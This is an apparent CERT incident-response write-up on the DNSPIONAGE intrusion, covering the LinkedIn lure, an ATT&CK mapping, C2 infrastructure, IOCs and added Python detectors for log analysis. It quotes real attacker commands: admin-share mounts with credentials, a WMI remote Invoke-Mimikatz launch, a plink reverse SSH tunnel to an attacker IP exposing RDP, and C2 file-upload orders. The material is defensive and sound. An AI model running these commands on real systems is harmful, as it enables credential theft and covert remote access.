[DNSPIONAGE] – Focus on internal actions


Introduction

Recently, we handled an incident response involving the DNSPIONAGE malware.

At CERT-OPMD, we thought it would be interesting to share our observations.

Mostly we observed quite common actions and tools, as described in the infographic below.

How DNSPIONAGE infects targets

In this blog post we will not describe and analyse the dropper again, because Talos already did a great job here: https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

Instead we focus on what they could not see with their telemetry, and on what we did see during our investigation.

The screenshot above shows what we are talking about here.

Talos observed two domains during their analysis:

  • hr-suncor[.]com
  • hr-wipro[.]com

and they obtained the "Suncor" dropper.

During our investigation, our users were targeted with the Wipro document (cf. screenshot below):

A Google reverse image search shows where the attackers got the image below (spoiler: from the legitimate wipro.com website, see screenshot below).

So the attackers clearly invested in a convincing, well-targeted spear-phishing lure.

During our investigation we had the chance to speak with very cooperative users, who remembered odd things that had happened to them.

One of them remembered that he had been chatting with a "Wipro HR" contact on LinkedIn for a few days before the attack.

We hid the identity of the LinkedIn account because we assume there is a real person behind it, whose account may have been stolen.

Fortunately, the infected users were technical IT people, so it was easy to discuss "phishing", "spear phishing via social media", etc. with them.

We hope this data will help you understand how DNSPIONAGE infects people.

Tools used by DNSPIONAGE to perform internal actions

Internal actions observed

Now we describe the lateral movement we observed during the incident response.

We observed the very "usual" phases in this case: a preparation phase for the whole attack (domain registration, and so on), a delivery phase (social engineering through a professional social network), then an installation and C&C phase (the malware is dropped, and the macro that drops it creates a scheduled task).

Then we observed the adversaries performing directory listings through batch files:

  • dir /s /a C:\ 2>&1    (repeated for every drive letter from C: to Z:)

These listings were exfiltrated over HTTP to the C&C for analysis: the actions we observed next were file copying and the exfiltration of specific files, such as a file containing the backup configuration. We assume the listings were used to map the environment "passively".

Once they had hostnames, the adversaries performed discovery with built-in Microsoft tools: network discovery, software discovery, share discovery, etc.:

  • wmic logicaldisk get name
  • net group "domain admins" /domain
  • ping -n 1 -a IP
  • net use \\HOSTNAME\c$ /user:"DOMAIN\USERNAME" "PASSWORD" 2>&1
  • WMIC /Node:localhost /Namespace:\\root\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1
  • wmic /node:"HOSTNAME" process call create "cmd /c powershell -exec bypass import-module c:\users\public\new.ps1;invoke-mimikatz"

Two of these go beyond discovery: the net use line mounts the admin share of a remote host with stolen credentials, and the last line launches Mimikatz on a remote host through WMI (the Invoke-Mimikatz script had been copied to c:\users\public\new.ps1 on that host beforehand). Both are worth alerting on: a domain account mounting c$ with a password on the command line, and a remote process creation whose payload is "powershell -exec bypass".

With all the information gathered, the adversaries could perform precise lateral movement onto critical servers: they installed plink (PuTTY's command-line SSH client) to open an SSH tunnel and reach RDP remotely.

  • echo y | .\downloads\plink32.exe 185.236.78.63 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>

Read it as follows: plink connects out to the attacker's SSH server 185.236.78.63 on TCP/443 (so the session looks like HTTPS to egress filtering), and -R asks that server to listen on port 12456 and relay the connections it receives back through the tunnel to HOSTNAME:3389. The attacker then simply points an RDP client at port 12456 of their own server; no inbound rule is needed on the victim side. The "echo y" auto-accepts the server host key prompt, and the password is passed on the command line with -pw, which is why it shows up verbatim in process-creation logs.
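As an added example (not CERT-OPMD's code and not part of the original post), the following Python script runs the detection logic a SOC would want for the commands above over a handful of constructed process-creation command lines (host names, accounts and passwords are made up; the command shapes are the ones observed). It maps each line to the ATT&CK technique used in the matrix below and, for plink, parses the -R argument into the tunnel endpoints so an analyst sees immediately which internal service was exposed and on which attacker host.

```python
"""Flag DNSPIONAGE-style discovery and lateral-movement command lines.

Added example, not CERT-OPMD's code. It runs over constructed process-creation
records (the kind a Sysmon Event ID 1 or Security 4688 export gives) and maps
each command line to the ATT&CK technique used in the write-up. Host names,
users and passwords in the samples are made up."""
import re

# Constructed sample: one process command line per record.
SAMPLE_CMDLINES = [
    r"cmd /c dir /s /a C:\ 2>&1",
    r'net use \\FILESRV01\c$ /user:"CORP\jdoe" "Winter2018!" 2>&1',
    r'wmic /node:"FILESRV01" process call create "cmd /c powershell -exec bypass import-module c:\users\public\new.ps1;invoke-mimikatz"',
    r"cmd /c echo y | .\downloads\plink32.exe 185.236.78.63 -P 443 -C -R 0.0.0.0:12456:FILESRV01:3389 -l svc -pw hunter2",
    r"ipconfig /all",
    r"C:\Program Files\Backup\agent.exe --schedule nightly",   # benign
]

PLINK_RE = re.compile(r"\bplink\w*(?:\.exe)?", re.IGNORECASE)
REVERSE_FWD_RE = re.compile(r"-R\s+(\S+)")
SSH_PORT_RE = re.compile(r"-P\s+(\d+)")

FINDINGS = {
    "T1083": "recursive or remote directory listing",
    "T1077": "admin share (x$) mount with inline credentials",
    "T1047": "remote process creation through WMI",
    "T1086": "PowerShell launched with -exec bypass",
    "T1003": "Mimikatz invocation",
    "T1076": "reverse SSH tunnel exposing RDP",
    "T1016": "network configuration dump (ipconfig /all)",
    "T1069": "Domain Admins group enumeration",
    "T1063": "antivirus enumeration via SecurityCenter",
}


def parse_reverse_forward(cmdline):
    """Describe the tunnel set up by a plink/ssh '-R' option, or return None.

    -R [listen_addr:]listen_port:target_host:target_port makes the SSH *server*
    listen on listen_port and relay those connections, through the tunnel and
    the client, to target_host:target_port. The attacker reaches the internal
    service by connecting to their own server; nothing inbound hits the victim."""
    m = REVERSE_FWD_RE.search(cmdline)
    if not m:
        return None
    parts = m.group(1).split(":")
    if len(parts) == 4:
        listen_addr, listen_port, target_host, target_port = parts
    elif len(parts) == 3:
        listen_addr, (listen_port, target_host, target_port) = "127.0.0.1", parts
    else:
        return None
    tokens = cmdline.split()
    # The SSH server is the first non-option token after the plink executable.
    server = None
    for i, tok in enumerate(tokens):
        if PLINK_RE.search(tok) and i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
            server = tokens[i + 1]
            break
    port = SSH_PORT_RE.search(cmdline)
    return {
        "ssh_server": server,
        "ssh_port": int(port.group(1)) if port else 22,
        "listen": f"{listen_addr}:{listen_port}",
        "target": f"{target_host}:{target_port}",
        "inline_password": "-pw" in tokens,
        "hostkey_autoaccept": bool(re.search(r"echo\s+y\s*\|", cmdline, re.I)),
    }


def classify(cmdline):
    """Return [(technique_id, description), ...] for one command line."""
    low = cmdline.lower()
    hits = []
    if re.search(r"\bdir\b.*\s/s\b", low) or re.search(r"\bdir\s+\\\\", low):
        hits.append("T1083")
    if re.search(r"\bnet\s+use\s+\\\\\S+\\[a-z]\$", low) and "/user:" in low:
        hits.append("T1077")
    if re.search(r"\bwmic\b.*/node:", low) and "process call create" in low:
        hits.append("T1047")
    if re.search(r"-exec(?:utionpolicy)?\s+bypass", low):
        hits.append("T1086")
    if "invoke-mimikatz" in low or "sekurlsa::" in low:
        hits.append("T1003")
    if PLINK_RE.search(cmdline):
        fwd = parse_reverse_forward(cmdline)
        if fwd and fwd["target"].endswith(":3389"):
            hits.append("T1076")
    if re.search(r"\bipconfig\b.*\s/all\b", low):
        hits.append("T1016")
    if re.search(r"\bnet\s+group\b.*\s/domain\b", low):
        hits.append("T1069")
    if "wmic" in low and "securitycenter" in low:
        hits.append("T1063")
    return [(tid, FINDINGS[tid]) for tid in hits]


def scan(cmdlines):
    """Scan command lines; returns (record_index, technique_id, description) triples."""
    return [(i, tid, desc) for i, line in enumerate(cmdlines) for tid, desc in classify(line)]


if __name__ == "__main__":
    for idx, tid, desc in scan(SAMPLE_CMDLINES):
        print(f"record {idx}: {tid} {desc}")
    print(parse_reverse_forward(SAMPLE_CMDLINES[3]))
```

The plink parser is the part worth keeping: an alert that says "reverse tunnel from 185.236.78.63:443 exposing FILESRV01:3389 on 0.0.0.0:12456" tells the responder which host to isolate and which external IP to block, whereas a bare "plink.exe executed" does not.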

The diagram below is here to help understand DNSPIONAGE's process on the network.

Tool listing
  • Mimikatz: a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks.
  • Off-the-shelf administration software
  • Bitvise WinSSHD: an easy-to-use SSH server which includes secure remote access via console (vt100, xterm and bvterm supported) and secure remote access via GUI (Remote Desktop or WinVNC required).
  • Open-source hacking tools: Invoke-Mimikatz.ps1 (https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1)
  • Custom malware: DNSPIONAGE
  • PuTTY (plink32.exe): used to open an SSH tunnel in order to gain RDP access to internal assets
ATT&CK Matrix mapping

To understand the attackers' entire behaviour, from initial access to data exfiltration, we built a matrix reconstructing their full set of TTPs.

We based our matrix on MITRE's work; MITRE ATT&CK™ is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. So we broke the attackers' actions down phase by phase, so that any analyst or researcher can recognise and remediate this situation if they come across it.

For each MITRE ATT&CK phase: technique (ID), IOC, then comments and observations.

Initial Access
  • Spearphishing via Service (T1194)
    IOC: https://fr[.]linkedin[.]com/in/XXXXXXXXXX
    Observation: an "HR consultant" chatted with the targets for weeks through LinkedIn before delivering the spearphishing link.
  • Spearphishing Link (T1192)
    IOC: http://hr-wipro[.]com/Wipro_Working_Conditions.doc

Execution
  • Windows Management Instrumentation (T1047)
    IOC: wmic /node:"USER" /user:"DOMAIN\USERNAME" /password:PASSWORD process call create "cmd /c echoy y | .\Downloads\plink32.exe 185.236.78.63 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>"
    Observation: the command failed but was attempted three times.
  • Scripting (T1064)
    IOC: Downloads\bat_file_46583.bat
    Observation: custom batch files scripted the actions (directory listing, copying the .ps1 tools to many other assets). Captured output of one of them:
      C:\Users\USERNAME\.oracleServices>CHCP 65001
      C:\Users\USERNAME\.oracleServices>copy .\Downloads\new.ps1 \\HOSTNAME\c$\users\public\ 2>&1
              1 file(s) copied.
      C:\Users\USERNAME\.oracleServices>copy .\Downloads\new.ps1 \\HOSTNAME\c$\users\public\ 2>&1
              1 file(s)
  • Command-Line Interface (T1059)
    IOC: wmic /node:"HOSTNAME" process call create "cmd /c powershell -exec bypass import-module c:\users\public\new.ps1;invoke-mimikatz"
    Observation: cmd is used to call PowerShell with the "-exec bypass" argument.
  • PowerShell (T1086)
    IOC: same command as above
    Observation: PowerShell with "-exec bypass" imports new.ps1 and launches Mimikatz.

Persistence
  • Scheduled Task (T1053)
    IOC:
      Set service = CreateObject (schedule.service)
      regInfo.Description = "chromium updater v 37.5.0"
      regInfo.Author = "Google Inc."
    Observation: observed in the dropper's macro; the task masquerades as a Chromium updater authored by "Google Inc.".

Defense Evasion
  • File Deletion (T1107)
    IOC: del .\Downloads\bat_file_46583.bat
    Observation: after running a custom .bat downloaded from the C2, the attackers deleted it immediately.

Credential Access
  • Credential Dumping (T1003)
    IOC: sekurlsa::logonpasswords
    Observation: the script is https://github.com/Veil-Framework/Veil-Pillage/blob/master/data/PowerSploit/Invoke-Mimikatz.ps1, which embeds mimikatz 2.0 alpha (x64) release "Kiwi en C" (Feb 16 2015 22:15:28).

Discovery
  • System Information Discovery (T1082)
    IOC: echo %username% (i: -4000, t: -1, k: 0) | hostname (i: -5000, t: -1, k: 0) | systeminfo | findstr /B /C:"Domain" (i: -6000, t: -1, k: 0)
    Observation: get the current user, the host name and the domain membership.
  • Permission Groups Discovery (T1069)
    IOC: net group "domain admins" /domain
    Observation: enumerate the members of the Domain Admins group.
  • Query Registry (T1012)
    IOC: reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client"
    Observation: this key holds the user's RDP client history (the servers previously reached with mstsc), i.e. a ready-made list of lateral movement targets.
  • File and Directory Discovery (T1083)
    IOC: dir /s /a C:\ 2>&1 and dir \\HOSTNAME\c$ 2>&1
    Observation: batch scripts perform directory discovery locally or remotely.
  • Windows Admin Shares (T1077)
    IOC: net use \\HOSTNAME\c$ /user:"DOMAIN\USERNAME" "PASSWORD" 2>&1
    Observation: attempt to mount the admin share of a remote system with stolen credentials.
  • Remote System Discovery (T1018)
    IOC: ping -n 1 -a IP
    Observation: check whether the IP is up and resolve its host name (-a).
  • Security Software Discovery (T1063)
    IOC: WMIC /Node:localhost /Namespace:\\root\SecurityCenter Path AntiVirusProduct Get /Format:List | more | findstr displayName 2>&1
    Observation: list the antivirus products registered with the Windows Security Center.
  • System Network Configuration Discovery (T1016)
    IOC: ipconfig /all
    Observation: get the host's full network configuration.
  • System Information Discovery (T1082)
    IOC: wmic logicaldisk get name
    Observation: list the logical drive letters.

Lateral Movement
  • Remote Desktop Protocol (T1076)
    IOC: echo y | .\downloads\plink32.exe 185.236.78.63 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>
    Observation: plink32 opens a reverse SSH tunnel that exposes HOSTNAME:3389 on the attacker's server, giving them RDP access to the host.
  • Remote File Copy (T1105)
    IOC: copy .\Downloads\new.ps1 \\HOSTNAME\c$\users\public\ 2>&1
    Observation: remote copy over the admin share pushes the files used for lateral movement, like new.ps1 (Mimikatz).

Collection
  • Data from Local System (T1005)
    IOC (C2 order seen in log.txt):
      "ull": "/Client/Upload",
      "dl": [],
      "ul": ["d:\\mRemoteNG-IMFO\\confCons.xml"]
    Observation: the C2 ordered the upload of an mRemoteNG connection file (confCons.xml), which stores saved connections together with their credentials.

Exfiltration
  • Exfiltration Over Command and Control Channel (T1041)
    IOC:
      "ull": "/Client/Upload",
      [Message] uploading files form
      .\bat_file_17757_res.txt
    Observation: in log.txt we can see the JSON orders, including the "Upload" orders and the upload URL.

Command and Control
  • Commonly Used Port (T1043)
    IOC: port 80 (HTTP) for the C2; port 443 for the SSH tunnel
  • Standard Application Layer Protocol (T1071)
    IOC: HTTP, DNS
  • Data Encoding (T1132)
    IOC:
      [Message] send command result dns length:63
      [Message] hSfAGJRFIAJHGGWU6S[…]0.0ffice36o.com
      [Message] umCGGJRFI[…]0.0ffice36o.com
      [Message] 6L6yGJRFIA2[…]0.0ffice36o.com
    Observation: DNS messages are Base32 encoded (63 is also the maximum length of a single DNS label).
  • Multiband Communication (T1026)
    IOC:
      [Message] config file found!
      [Message] current directory set to C:\Users\USERNAME\.oracleServices\
      [Message] entering normal mode
      [Message] get command with dns
    Observation: the malware can switch between HTTP mode and DNS mode to exfiltrate data.
  • Remote File Copy (T1105)
    IOC: "dl": ["/Client/Download/LXqaYRoxoPYNOwjfDadLJAExtjgZYBunvJFwoEohVXJvK"],
    Observation: the malware downloaded batch or ps1 scripts to perform the actions.
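The Base32 DNS queries are the most visible artefact of this malware in a resolver log. As an added example that is not part of the original article, this Python script scores each query in a constructed resolver log: a match on the 0ffice36o.com C2 domain, a long label made only of Base32 characters, or a label at the 63-byte limit is flagged, and the label is decoded. The only elements taken from the investigation are the domain and the encoding; treating the first four characters of each label as a random prefix is an assumption read off the three samples above (they share the same text from the fifth character on), and the log lines and payloads are constructed.

```python
"""Spot DNSPIONAGE-style DNS tunnelling in a resolver query log.

Added example, not CERT-OPMD's code. Only the C2 domain 0ffice36o.com and the
Base32 encoding come from the write-up; the log lines below are constructed.
Treating the first 4 characters of each label as a random prefix is an
assumption read off the three samples above, which all share the same text
from the 5th character on."""
import base64
import binascii
import string

WATCHLIST = {"0ffice36o.com"}                       # DNS C2 domain from the investigation
PREFIX_LEN = 4                                      # assumed random prefix length
B32_ALPHABET = set(string.ascii_uppercase + "234567")
MAX_LABEL = 63                                      # RFC 1035 label limit ("length:63" above)


def b32_decode_lenient(text):
    """Decode unpadded, mixed-case Base32; None if it is not Base32 at all."""
    text = text.upper()
    if not text or not set(text) <= B32_ALPHABET:
        return None
    try:
        return base64.b32decode(text + "=" * ((-len(text)) % 8))
    except (binascii.Error, ValueError):
        return None


def make_tunnel_label(payload, prefix="hSfA"):
    """Build a label in the observed shape (prefix + Base32) for the sample log."""
    return prefix + base64.b32encode(payload).decode().rstrip("=")


# Constructed resolver log: "<time> <client> <qname>".
SAMPLE_DNS_LOG = [
    "10:41:02 10.0.5.23 www.wipro.com",
    "10:41:09 10.0.5.23 " + make_tunnel_label(b"CORP\\jdoe") + ".0ffice36o.com",
    "10:41:10 10.0.5.23 " + make_tunnel_label(b"A" * 32, prefix="umCG") + ".0ffice36o.com",
    "10:42:00 10.0.5.40 teams.microsoft.com",
    "10:42:05 10.0.5.40 dc1.corp.example",
]


def analyze_query(qname):
    """Score one query name; 'reasons' is empty when nothing looks wrong."""
    labels = qname.rstrip(".").split(".")
    label = labels[0]
    domain = ".".join(labels[-2:]).lower()
    reasons = []
    if domain in WATCHLIST:
        reasons.append("watchlist domain")
    # Short labels made of letters only (e.g. "teams") are legitimate; length is the tell.
    b32_only = bool(label) and set(label.upper()) <= B32_ALPHABET
    if b32_only and len(label) > 30:
        reasons.append("long Base32-only label")
    if len(label) == MAX_LABEL:
        reasons.append("label at the 63-byte limit")
    # Only try to recover the payload for flagged queries (prefix stripped first).
    decoded = b32_decode_lenient(label[PREFIX_LEN:]) if reasons else None
    return {"qname": qname, "domain": domain, "label_len": len(label),
            "decoded": decoded, "reasons": reasons}


def scan_dns(lines):
    """Return the analyses of every flagged query, in log order, with the client IP."""
    flagged = []
    for line in lines:
        fields = line.split()
        if len(fields) < 3:
            continue
        result = analyze_query(fields[2])
        if result["reasons"]:
            result["client"] = fields[1]
            flagged.append(result)
    return flagged


if __name__ == "__main__":
    for hit in scan_dns(SAMPLE_DNS_LOG):
        print(hit["client"], hit["qname"], hit["reasons"], hit["decoded"])
```

The watchlist match is the reliable signal; the label-length heuristics only exist for the day the attackers register a new domain. They are deliberately loose, so in production they should be combined with a per-client count of distinct subdomains under one apex, which is what a tunnel produces and a normal client does not.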

Infrastructure in use during investigation

Global overview – DNS & IP publicly observable

During the investigation we were able to trace a number of IP addresses used by the attackers: the IP that hosted the HTTP C2, the IPs behind the DNS C2 domain, the SSH endpoint used for the RDP tunnel, and so on:

 

IP                Use
185.236.78.63     SSH endpoint of the plink tunnel used for RDP
185.161.211.72    *.0ffice36o[.]com (DNS C2)
107.161.23.204    *.0ffice36o[.]com (DNS C2)
192.161.187.200   *.0ffice36o[.]com (DNS C2)
209.141.38.71     *.0ffice36o[.]com (DNS C2)
185.20.184.138    HTTP server for the C2

 

By performing passive DNS resolution on hr-wipro[.]com (the dropper delivery domain) and hr-suncor[.]com (observed by Talos), we obtained the following IPs:

hr-wipro[.]com
  • 209.141.38.71
  • 107.161.23.204
  • 192.161.187.200
  • 185.174.101.168
  • 185.161.211.79

hr-suncor[.]com
  • 185.161.211.79
  • 185.174.101.168

The two delivery domains share 185.161.211.79 and 185.174.101.168, and hr-wipro[.]com shares three IPs (209.141.38.71, 107.161.23.204, 192.161.187.200) with the *.0ffice36o[.]com C2 domain, which ties the delivery and C2 infrastructure together.

Infrastructures used for lateral movement

After compromising the first victim, the attackers' main goal was to move laterally in order to reach more sensitive data and/or assets:

  • They first tried to run Mimikatz remotely on several servers (which triggered our SOC alert). Fortunately, it seems they only used sekurlsa::logonpasswords and did not create golden or silver tickets.
  • Mimikatz was not very effective, but they could already execute arbitrary code remotely.
    • So they copied plink32.exe (PuTTY's command-line SSH client) to several assets (sha256: 3984ae8dd6df1196211232eb56393a4ce3a330508c5862c38ea3b8faf8048072).
    • They executed plink32.exe to create a tunnel in order to RDP onto those assets: echo y | .\downloads\plink32.exe 185.236.78.63 -P 443 -C -R 0.0.0.0:12456:HOSTNAME:3389 -l <login> -pw <password>
    • Over RDP it was easier for them to reach database servers and identify other critical assets.

Conclusion

We were very lucky during the investigation: the attackers made a lot of mistakes that made it easy to investigate and gave us very precise indicators of how they perform their requests.

We hope this article will help you investigate internally if you think you may have been targeted by DNSPIONAGE.

IOC

CSV format

value,type
*.0ffice36o.com|185.161.211.72,domain|ip
*.0ffice36o.com|107.161.23.204,domain|ip
*.0ffice36o.com|192.161.187.200,domain|ip
*.0ffice36o.com|209.141.38.71,domain|ip
hr-wipro.com|209.141.38.71,domain|ip
hr-wipro.com|107.161.23.204,domain|ip
hr-wipro.com|192.161.187.200,domain|ip
hr-wipro.com|185.174.101.168,domain|ip
hr-wipro.com|185.161.211.79,domain|ip
hr-suncor.com|185.161.211.79,domain|ip
hr-suncor.com|185.174.101.168,domain|ip
185.236.78.63,ip-dst
185.20.184.138,ip-dst
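To make this list directly usable, here is an added example (not CERT-OPMD's code) that parses it with Python: the domain|ip rows are composite attributes (a domain and the IP it resolved to), so each is split into two indicators, and the *.0ffice36o.com wildcard is matched on the apex and on every subdomain without matching look-alikes such as x0ffice36o.com. The events it scans are constructed; only the CSV is from this page.

```python
"""Load the IOC list above and match it against connection and DNS records.

Added example, not CERT-OPMD's code. The CSV is the list from this page; the
'domain|ip' rows are composite attributes (a domain and the IP it resolved to
at the time), so they are split into separate indicators. The events are
constructed; matching '*.0ffice36o.com' on the apex as well as on every
subdomain is this example's choice."""
import csv
import io

IOC_CSV = """value,type
*.0ffice36o.com|185.161.211.72,domain|ip
*.0ffice36o.com|107.161.23.204,domain|ip
*.0ffice36o.com|192.161.187.200,domain|ip
*.0ffice36o.com|209.141.38.71,domain|ip
hr-wipro.com|209.141.38.71,domain|ip
hr-wipro.com|107.161.23.204,domain|ip
hr-wipro.com|192.161.187.200,domain|ip
hr-wipro.com|185.174.101.168,domain|ip
hr-wipro.com|185.161.211.79,domain|ip
hr-suncor.com|185.161.211.79,domain|ip
hr-suncor.com|185.174.101.168,domain|ip
185.236.78.63,ip-dst
185.20.184.138,ip-dst
"""

# Constructed events: connection records, with the queried name for DNS lookups.
SAMPLE_EVENTS = [
    {"src": "10.0.5.23", "dst": "185.20.184.138", "dport": 80},
    {"src": "10.0.5.23", "dst": "10.0.0.53", "dport": 53, "qname": "abcd.0ffice36o.com"},
    {"src": "10.0.5.40", "dst": "203.0.113.10", "dport": 443, "qname": "teams.microsoft.com"},
    {"src": "10.0.5.23", "dst": "185.236.78.63", "dport": 443},
    {"src": "10.0.5.40", "dst": "10.0.0.53", "dport": 53, "qname": "x0ffice36o.com"},
]


def parse_ioc_csv(text):
    """Split composite 'a|b,domain|ip' rows and bucket indicators by kind."""
    iocs = {"ips": set(), "domains": set(), "wildcards": set()}
    for row in csv.DictReader(io.StringIO(text)):
        values, kinds = row["value"].split("|"), row["type"].split("|")
        if len(values) != len(kinds):
            raise ValueError(f"malformed composite row: {row}")
        for value, kind in zip(values, kinds):
            value = value.strip().lower()
            if kind in ("ip", "ip-dst", "ip-src"):
                iocs["ips"].add(value)
            elif kind in ("domain", "hostname"):
                if value.startswith("*."):
                    iocs["wildcards"].add(value[2:])
                else:
                    iocs["domains"].add(value)
    return iocs


def match_domain(iocs, name):
    """Return the indicator a name matches, or None."""
    name = name.rstrip(".").lower()
    if name in iocs["domains"]:
        return name
    for apex in iocs["wildcards"]:
        # endswith('.' + apex): 'x0ffice36o.com' must not match '*.0ffice36o.com'
        if name == apex or name.endswith("." + apex):
            return "*." + apex
    return None


def match_events(iocs, events):
    """Return (event_index, indicator_kind, indicator) for every hit, in event order."""
    matches = []
    for i, ev in enumerate(events):
        if ev["dst"] in iocs["ips"]:
            matches.append((i, "ip", ev["dst"]))
        hit = match_domain(iocs, ev.get("qname", ""))
        if hit:
            matches.append((i, "domain", hit))
    return matches


if __name__ == "__main__":
    loaded = parse_ioc_csv(IOC_CSV)
    for idx, kind, indicator in match_events(loaded, SAMPLE_EVENTS):
        print(f"event {idx}: {kind} match on {indicator} from {SAMPLE_EVENTS[idx]['src']}")
```

Keep the composite rows composite when you load them into a platform that supports it (MISP does): the pairing records which IP a domain resolved to at the time of the investigation, and that context is lost once the two halves become independent indicators.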